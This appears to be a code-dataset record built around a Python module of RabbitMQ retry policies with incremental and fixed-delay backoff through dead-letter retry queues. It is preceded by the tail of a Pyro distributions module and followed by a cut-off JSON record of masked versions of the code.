d1.independent(2)\n >>> [d3.batch_shape, d3.event_shape]\n [torch.Size(()), torch.Size((2, 3, 4, 5))]\n\n :param int reinterpreted_batch_ndims: The number of batch dimensions\n to reinterpret as event dimensions.\n :return: A reshaped version of this distribution.\n :rtype: :class:`ReshapedDistribution`\n \"\"\"\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n # TODO return pyro.distributions.torch.Independent(self, reinterpreted_batch_ndims)\n return ReshapedDistribution(self, reinterpreted_batch_ndims=reinterpreted_batch_ndims)\n\n def mask(self, mask):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distributions :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n :return: A masked copy of this distribution.\n :rtype: :class:`MaskedDistribution`\n \"\"\"\n return MaskedDistribution(self, mask)\n\n\nclass TorchDistribution(torch.distributions.Distribution, TorchDistributionMixin):\n \"\"\"\n Base class for PyTorch-compatible distributions with Pyro support.\n\n This should be the base class for almost all new Pyro distributions.\n\n .. note::\n\n Parameters and data should be of type :class:`~torch.Tensor`\n and all methods return type :class:`~torch.Tensor` unless\n otherwise noted.\n\n **Tensor Shapes**:\n\n TorchDistributions provide a method ``.shape()`` for the tensor shape of samples::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n\n Pyro follows the same distribution shape semantics as PyTorch. It distinguishes\n between three different roles for tensor shapes of samples:\n\n - *sample shape* corresponds to the shape of the iid samples drawn from the distribution.\n This is taken as an argument by the distribution's `sample` method.\n - *batch shape* corresponds to non-identical (independent) parameterizations of\n the distribution, inferred from the distribution's parameter shapes. This is\n fixed for a distribution instance.\n - *event shape* corresponds to the event dimensions of the distribution, which\n is fixed for a distribution class. These are collapsed when we try to score\n a sample from the distribution via `d.log_prob(x)`.\n\n These shapes are related by the equation::\n\n assert d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n Distributions provide a vectorized\n :meth`~torch.distributions.distribution.Distribution.log_prob` method that\n evaluates the log probability density of each event in a batch\n independently, returning a tensor of shape\n ``sample_shape + d.batch_shape``::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n log_p = d.log_prob(x)\n assert log_p.shape == sample_shape + d.batch_shape\n\n **Implementing New Distributions**:\n\n Derived classes must implement the methods\n :meth:`~torch.distributions.distribution.Distribution.sample`\n (or :meth:`~torch.distributions.distribution.Distribution.rsample` if\n ``.has_rsample == True``) and\n :meth:`~torch.distributions.distribution.Distribution.log_prob`, and must\n implement the properties\n :attr:`~torch.distributions.distribution.Distribution.batch_shape`,\n and :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n Discrete classes may also implement the\n :meth:`~torch.distributions.distribution.Distribution.enumerate_support`\n method to improve gradient estimates and set\n ``.has_enumerate_support = True``.\n \"\"\"\n pass\n\n\nclass ReshapedDistribution(TorchDistribution):\n \"\"\"\n Reshapes a distribution by adding ``sample_shape`` to its total shape\n and adding ``reinterpreted_batch_ndims`` to its\n :attr:`~torch.distributions.distribution.Distribution.event_shape`.\n\n :param torch.Size sample_shape: The size of the iid batch to be drawn from\n the distribution.\n :param int reinterpreted_batch_ndims: The number of extra event dimensions that will\n be considered dependent.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, sample_shape=torch.Size(), reinterpreted_batch_ndims=0):\n sample_shape = torch.Size(sample_shape)\n if reinterpreted_batch_ndims > len(sample_shape + base_dist.batch_shape):\n raise ValueError('Expected reinterpreted_batch_ndims <= len(sample_shape + base_dist.batch_shape), '\n 'actual {} vs {}'.format(reinterpreted_batch_ndims,\n len(sample_shape + base_dist.batch_shape)))\n self.base_dist = base_dist\n self.sample_shape = sample_shape\n self.reinterpreted_batch_ndims = reinterpreted_batch_ndims\n shape = sample_shape + base_dist.batch_shape + base_dist.event_shape\n batch_dim = len(shape) - reinterpreted_batch_ndims - len(base_dist.event_shape)\n batch_shape, event_shape = shape[:batch_dim], shape[batch_dim:]\n super(ReshapedDistribution, self).__init__(batch_shape, event_shape)\n\n def expand_by(self, sample_shape):\n base_dist = self.base_dist\n sample_shape = torch.Size(sample_shape) + self.sample_shape\n reinterpreted_batch_ndims = self.reinterpreted_batch_ndims\n return ReshapedDistribution(base_dist, sample_shape, reinterpreted_batch_ndims)\n\n def independent(self, reinterpreted_batch_ndims=None):\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n base_dist = self.base_dist\n sample_shape = self.sample_shape\n reinterpreted_batch_ndims = self.reinterpreted_batch_ndims + reinterpreted_batch_ndims\n return ReshapedDistribution(base_dist, sample_shape, reinterpreted_batch_ndims)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape + self.sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape + self.sample_shape)\n\n def log_prob(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() - self.event_dim])\n return sum_rightmost(self.base_dist.log_prob(value), self.reinterpreted_batch_ndims).expand(shape)\n\n def score_parts(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() - self.event_dim])\n log_prob, score_function, entropy_term = self.base_dist.score_parts(value)\n log_prob = sum_rightmost(log_prob, self.reinterpreted_batch_ndims).expand(shape)\n if not isinstance(score_function, numbers.Number):\n score_function = sum_rightmost(score_function, self.reinterpreted_batch_ndims).expand(shape)\n if not isinstance(entropy_term, numbers.Number):\n entropy_term = sum_rightmost(entropy_term, self.reinterpreted_batch_ndims).expand(shape)\n return ScoreParts(log_prob, score_function, entropy_term)\n\n def enumerate_support(self):\n if self.reinterpreted_batch_ndims:\n raise NotImplementedError(\"Pyro does not enumerate over cartesian products\")\n\n samples = self.base_dist.enumerate_support()\n if not self.sample_shape:\n return samples\n\n # Shift enumeration dim to correct location.\n enum_shape, base_shape = samples.shape[:1], samples.shape[1:]\n samples = samples.reshape(enum_shape + (1,) * len(self.sample_shape) + base_shape)\n samples = samples.expand(enum_shape + self.sample_shape + base_shape)\n return samples\n\n @property\n def mean(self):\n return self.base_dist.mean.expand(self.batch_shape + self.event_shape)\n\n @property\n def variance(self):\n return self.base_dist.variance.expand(self.batch_shape + self.event_shape)\n\n\nclass MaskedDistribution(TorchDistribution):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distribution's :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, mask):\n if broadcast_shape(mask.shape, base_dist.batch_shape) != base_dist.batch_shape:\n raise ValueError(\"Expected mask.shape to be broadcastable to base_dist.batch_shape, \"\n \"actual {} vs {}\".format(mask.shape, base_dist.batch_shape))\n self.base_dist = base_dist\n self._mask = mask\n super(MaskedDistribution, self).__init__(base_dist.batch_shape, base_dist.event_shape)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape)\n\n def log_prob(self, value):\n return self.base_dist.log_prob(value) * self._mask\n\n def score_parts(self, value):\n return self.base_dist.score_parts(value) * self._mask\n\n def enumerate_support(self):\n return self.base_dist.enumerate_support()\n\n @property\n def mean(self):\n return self.base_dist.mean\n\n @property\n def variance(self):\n return self.base_dist.variance\n",
"step-ids": [
27,
35,
36,
39,
44
]
}
|
[
27,
35,
36,
39,
44
] |
# -*- coding: utf-8 -*-
"""
Noting is perfect, errors and timeouts may happen, and when such failures happen, the
consumer has to decide what to do with that. By default, the consumer would reject the
envelope (RabbitMQ message) when a failure happens. However, errors and timeouts
issues, unless there is a software bug, usually solved with retries. Just like the
routing, the consumer doesn't make the retry decision itself, the consumer delegates
it to a retry policy. Retry policy defines how the retry is performed. Retries
usually happens with back-offs to avoid worsening the situation by hammering other
services with more requests, especially if it was a timeout issue. The consumer can be
configured to use a retry policy by calling :meth:`.Consumer.set_retry_policy`, passing
an instance of :class:`.RetryPolicy`. When a retry policy is set, the consumer won't
reject messages, but rather, it send them to the retry policy to deal with the
situation by invoking :meth:`.RetryPolicy.retry` method. Based on it's implementation,
The retry policy decides how to do retries.
There are 4 different retry policies available:
1. :class:`.UnlimitedRetriesPolicy`, Unlimited retries policy
2. :class:`.LimitedRetriesPolicy`, Limited retries policy
3. :class:`.FixedDelayUnlimitedRetriesPolicy`, Fixed delay unlimited retries policy
4. :class:`.FixedDelayLimitedRetriesPolicy`, Fixed delay limited retries policy
Custom retry policies can be created by implementing the base class
:class:`.RetryPolicy`
"""
import logging
logger = logging.getLogger(__name__)
class RetryPolicy(object):
"""Base class for retry policies.
Subclasses MUST implement :meth:`retry` method.
"""
def __init__(self, **kwargs):
# type: (RetryPolicy) -> None
super(RetryPolicy, self).__init__()
def retry(self, envelope):
# type: (RetryPolicy, Envelope) -> None
"""This method is implemented by the subclass."""
raise NotImplementedError()
class BaseRetryPolicy(RetryPolicy):
"""Base retry policy class for :class:`.UnlimitedRetriesPolicy` and
:class:`.LimitedRetriesPolicy`.
It has implementation for geting mesage death count and retry queue creation.
"""
def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):
# type: (BaseRetryPolicy, Consumer, str) -> None
"""
:param Consumer consumer: message consumer instance
:param str retry_queue_suffix: Suffix used when creating retry queues. Retry
queue names are constructed in this form "queue_name.<suffix>.<delay>".
Optional, default to ``retry``
"""
super(BaseRetryPolicy, self).__init__(**kwargs)
retry_queue_suffix = retry_queue_suffix.strip()
self.consumer = consumer
assert len(retry_queue_suffix) > 0
self.retry_queue_suffix = retry_queue_suffix
# To avoid frequent retry queue create and destroy for low retry delays
self.min_retry_queue_ttl = 20 * 1000 # 20 seconds
def set_original_delivery_info_header(self, envelope):
# type: (BaseRetryPolicy, Envelope) -> None
"""Save original message delivery infomation in a header."""
if not envelope.get_header('x-original-delivery-info'):
original_delivery_info = {
'consumer_tag': envelope.delivery_info.consumer_tag,
'delivery_tag': envelope.delivery_info.delivery_tag,
'redelivered': envelope.delivery_info.redelivered,
'exchange': envelope.delivery_info.exchange,
'routing_key': envelope.delivery_info.routing_key
}
envelope.set_header('x-original-delivery-info',
original_delivery_info)
def get_death_count(self, envelope):
# type: (BaseRetryPolicy, Envelope) -> int
"""Return the death count of a message by examining "x-death" header.
:param Envelope envelope: Message envelope
:return int: death count
"""
death_header = envelope.get_header('x-death')
if death_header is None:
return 0
count = 0
for death in death_header:
if not death['queue'].startswith(self.consumer.queue_name):
continue
count += death.get('count', 1)
return count
def declare_retry_queue(self, delay):
# type: (BaseRetryPolicy, int) -> str
"""Declare a retry queue for the provided delay.
Each different delay has a different queue where all retry messages with the
same delay will be sent to till they expire and get sent back to the original
queue for handling retry. The queue is declared with a TTL and automatically
gets deleted. The queue TTL is equal to the provided delay. The retry
queue's dead letter exchange is (default) direct exchange and the dead letter
routing key is the original queue name where the messages originally
came from. The messages will be sent back to the original queue when they
reach their TTL, for handling retry.
The retry queue is redeclared before every a new message is sent to it.
Redeclaration resets the queue's TTL, preventing it from being destroyed.
:param int delay: Retry delay in seconds
:return: retry queue name
:rtype: str
"""
delay_in_ms = int(delay * 1000)
retry_queue_name = '{}.{}.{}'.format(
self.consumer.queue_name, self.retry_queue_suffix, delay_in_ms)
# To avoid frequent queue create and destroy for low retry delays
queue_ttl = delay_in_ms * 2
if queue_ttl < self.min_retry_queue_ttl:
queue_ttl = self.min_retry_queue_ttl
self.consumer.channel.queue_declare(
callback=None,
queue=retry_queue_name,
durable=self.consumer.durable,
nowait=True,
arguments={
'x-dead-letter-exchange': '',
'x-dead-letter-routing-key': self.consumer.queue_name,
'x-message-ttl': delay_in_ms,
'x-expires': queue_ttl
})
logger.warning(
'Retry queue "{}" is created/redeclared'.format(retry_queue_name))
return retry_queue_name
class UnlimitedRetriesPolicy(BaseRetryPolicy):
"""Unlimited Retries Policy.
This is an implementation of :class:`.RetryPolicy` which does incremental backoff,
unlimited retries.
:attr:`initial_delay`: is the initial/first backoff delay in seconds
:attr:`delay_incremented_by`: is number of seconds the backoff should be incremented
by after each death
:attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be
exceeded
"""
def __init__(self,
consumer,
initial_delay,
max_delay,
delay_incremented_by,
retry_queue_suffix='retry',
**kwargs):
# type: (UnlimitedRetriesPolicy, Consumer, int, int, int, str) -> None
"""
:param Consumer consumer: message consumer instance
:param int initial_delay: `initial_delay` is the initial/first backoff delay
in seconds.
:param int max_delay: `max_delay` is the final/maximum backoff delay in seconds
that should net be exceeded. When exceeded, this max is used.
:param int delay_incremented_by: `delay_incremented_by` is number of seconds
the backoff should be incremented by after each death.
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(UnlimitedRetriesPolicy,
self).__init__(consumer, retry_queue_suffix, **kwargs)
assert initial_delay >= 0
assert delay_incremented_by >= 0
assert max_delay >= initial_delay
self.initial_delay = initial_delay
self.max_delay = max_delay
self.delay_incremented_by = delay_incremented_by
def retry(self, envelope):
# type: (UnlimitedRetriesPolicy, Envelope) -> None
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
delay = self.initial_delay + (death_count * self.delay_incremented_by)
if delay > self.max_delay:
delay = self.max_delay
retry_queue_name = self.declare_retry_queue(delay)
# Save original delivery information
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(
exchange='',
routing_key=retry_queue_name,
properties=envelope.properties,
body=envelope.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.format(
envelope.message_id, delay, death_count + 1))
class LimitedRetriesPolicy(BaseRetryPolicy):
"""Limited Retries Policy.
This is an implementation of :class:`.RetryPolicy` which does incremental backoff,
limited number of retries.
:attr:`consumer`: message consumer instance
:attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message
is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self,
consumer,
retry_delays,
retry_queue_suffix='retry',
**kwargs):
# type: (LimitedRetriesPolicy, Consumer, Iterable[int], str) -> None
"""
:param Consumer consumer: message consumer instance
:param Iterable[int] retry_delays: Immutable list of retry backoff delays in
seconds. Message is sent to dlx when this list is exhausted.
e.g ``(1, 5, 10, 60, 5 * 60)``
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert len(retry_delays) > 0
super(LimitedRetriesPolicy, self).__init__(consumer, retry_queue_suffix,
**kwargs)
self.retry_delays = retry_delays
def retry(self, envelope):
# type: (LimitedRetriesPolicy, Envelope) -> None
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
The death count is used as an index for `retry_delays` list. Where each
item in the list represents a retry delay in seconds.
The message will be rejected if the death count exceeded the length of
`retry_delays` list.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
if death_count < len(self.retry_delays):
delay = self.retry_delays[death_count]
retry_queue_name = self.declare_retry_queue(delay)
# Save original delivery information
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(
exchange='',
routing_key=retry_queue_name,
properties=envelope.properties,
body=envelope.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.format(
envelope.message_id, delay, death_count + 1))
else:
logger.warning(
'Message [{}] exceeded retry limit; death count: {}'.format(
envelope.message_id, death_count + 1))
self.consumer.channel.basic_reject(
envelope.delivery_tag, requeue=False)
logger.error('Message [{}] is rejected'.format(envelope.message_id))
class FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):
"""Fixed delay unlimited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
unlimited retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):
# type: (FixedDelayUnlimitedRetriesPolicy, Consumer, int, str) -> None
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(FixedDelayUnlimitedRetriesPolicy, self).__init__(
consumer=consumer,
initial_delay=delay,
max_delay=delay,
delay_incremented_by=0,
retry_queue_suffix=retry_queue_suffix,
**kwargs)
class FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):
"""Fixed delay limited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
limited number of retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds.
:attr:`retries_limit`: retries limit count.
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self,
consumer,
delay,
retries_limit,
retry_queue_suffix='retry',
**kwargs):
# type: (FixedDelayLimitedRetriesPolicy, Consumer, int, int, str) -> None
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param int retries_limit: retries limit count
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert retries_limit > 0
retry_delays = tuple([delay] * retries_limit)
super(FixedDelayLimitedRetriesPolicy, self).__init__(
consumer=consumer,
retry_delays=retry_delays,
retry_queue_suffix=retry_queue_suffix,
**kwargs)
|
normal
|
{
"blob_id": "848934680253ff2950db7723b1fe82b2ae799900",
"index": 801,
"step-1": "<mask token>\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n <mask token>\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-2": "<mask token>\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n <mask token>\n\n def __init__(self, consumer, initial_delay, max_delay,\n delay_incremented_by, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + death_count * self.delay_incremented_by\n if delay > self.max_delay:\n delay = self.max_delay\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=envelope\n .payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning('Retry handling message [{}] after {}s; death count: {}'\n .format(envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-3": "<mask token>\n\n\nclass BaseRetryPolicy(RetryPolicy):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Unlimited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n unlimited retries.\n\n :attr:`initial_delay`: is the initial/first backoff delay in seconds\n\n :attr:`delay_incremented_by`: is number of seconds the backoff should be incremented\n by after each death\n\n :attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be\n exceeded\n \"\"\"\n\n def __init__(self, consumer, initial_delay, max_delay,\n delay_incremented_by, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + death_count * self.delay_incremented_by\n if delay > self.max_delay:\n delay = self.max_delay\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=envelope\n .payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning('Retry handling message [{}] after {}s; death count: {}'\n .format(envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer 